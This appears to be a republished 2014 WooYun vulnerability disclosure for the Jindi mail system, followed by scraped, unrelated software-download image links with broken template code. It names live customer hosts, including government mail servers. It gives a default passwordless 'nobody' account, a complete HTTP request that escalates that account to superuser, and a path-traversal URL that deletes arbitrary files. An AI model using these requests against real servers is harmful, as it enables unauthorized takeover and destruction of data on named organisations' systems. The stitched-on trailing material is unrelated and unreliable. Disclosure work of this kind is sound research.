2014-03-18:细节已通知厂商并且等待厂商处理中
2014-03-25:厂商已经确认,细节仅向厂商公开
2014-03-28:细节向第三方安全合作伙伴开放
2014-04-04:细节向核心白帽子及相关领域专家公开
2014-04-14:细节向普通白帽子公开
2014-05-04:细节向实习白帽子公开
2014-06-16:细节向公众公开
You know it.
详细说明:金笛邮件系统有大量客户,Check out http://www.mailer.com.cn/New%20Customers/index1.htm
举几个例子:
http://mail.njzj.gov.cn:8080
http://61.155.50.151
http://mail.lyx928.com:8080
http://mail.shszx.gov.cn:8600
http://mail.censoft.com.cn
http://mail.ascentgolden.com:8080
http://61.155.50.151
http://mail.lyx928.com:8080
下面,以http://mail.censoft.com.cn为例,作全程解说。
1.默认弱口令帐户
[用户名]nobody [密码]无密码 [域]root
2.普通用户提权
nobody是普通用户,提权,只需发送如下HTTP:
POST http://mail.censoft.com.cn/tmw/211ede8H38f/mailmain?type=msaveuser
Host: mail.censoft.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mail.censoft.com.cn/tmw/211ede8H38f/left.jsp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 312
subtype=edit&username=nobody&domain=root&usertype=S&first_name=&password=nobody&enable=true&enable_smtp=true&enable_pop3=true&enable_imap4=true&enable_webaccess=true&max_mailbox_size=-1&max_mailbox_msgs=-1&fm_size=-1&telephone=&mobile=&postalcode=&country=&state_province=&city=&organiztion=&department=&address=
注:因为版本不同,有时需要在包中加入Cookie。
再用密码nobody重新登陆。
焕然一新。
3.任意帐户密码修改
管理员能修改任意用户密码,这种情况还是比较少见,也非常危险。
4.任意文件删除
http://mail.censoft.com.cn/tmw/211ede8H38f/maintbackup.jsp?filename=[文件相对路径]&subtype=del
需指出,filename参数可目录回溯,由于攻击者容易获知金笛邮件系统文件结构,故危害极大。
You saw it.
修复方案:迅速通知客户。
版权声明:转载请注明来源 夕风号@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:20
确认时间:2014-03-25 23:18
厂商回复:CNVD确认并复现所述情况(在多个实例上),同时已经提取了应用特征,不过目前CNVD能找到的实例范围仍然超不过作者,已经转由CNCERT下发给相关分分中心。后续仍然请作者提供更好的找实例办法,目前来看,一些3.8以上版本的实例已经取消所述域用户
最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;
![英雄棋士团(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/yingxiongqishituanyuxiazai.jpg)
![美食小当家?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/meishixiaodangjia.png)
![2047?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/2047.jpg)
![荣誉指挥官(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/rongyuzhihuiguanyuxiazai.png)
![繁荣美食市场物语?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/fanrongmeishishichangwuyu.jpg)
![夸克浏览器 v4.2.1.138 好用的手机浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/kuakezuolanqi.jpg)
![移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/yidongbangongruanjian.jpg)
![乐秀视频编辑器 VideoShow v8.8.4 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/lexiushipinbianjiqi.png)
![X 浏览器 v3.3.9 一款小巧的安卓浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/x.jpg)
![安卓密码管理软件 Enpass v6.4.5.368 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/anzhuomimaguanliruanjian.jpg)
![差分复制同步 FastCopy-M v3.6.3.51 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/FastCopy3.png)
![多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Clover.png)
![文件重命名 Advanced Renamer v3.85 Lite 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Advanced_Renamer.png)
![网络防火监控 GlassWire Elite v2.1.166 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/GlassWire.png)
![影音播放器 Daum Potplayer v1.7.20538 美化便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/PotPlayer.png)
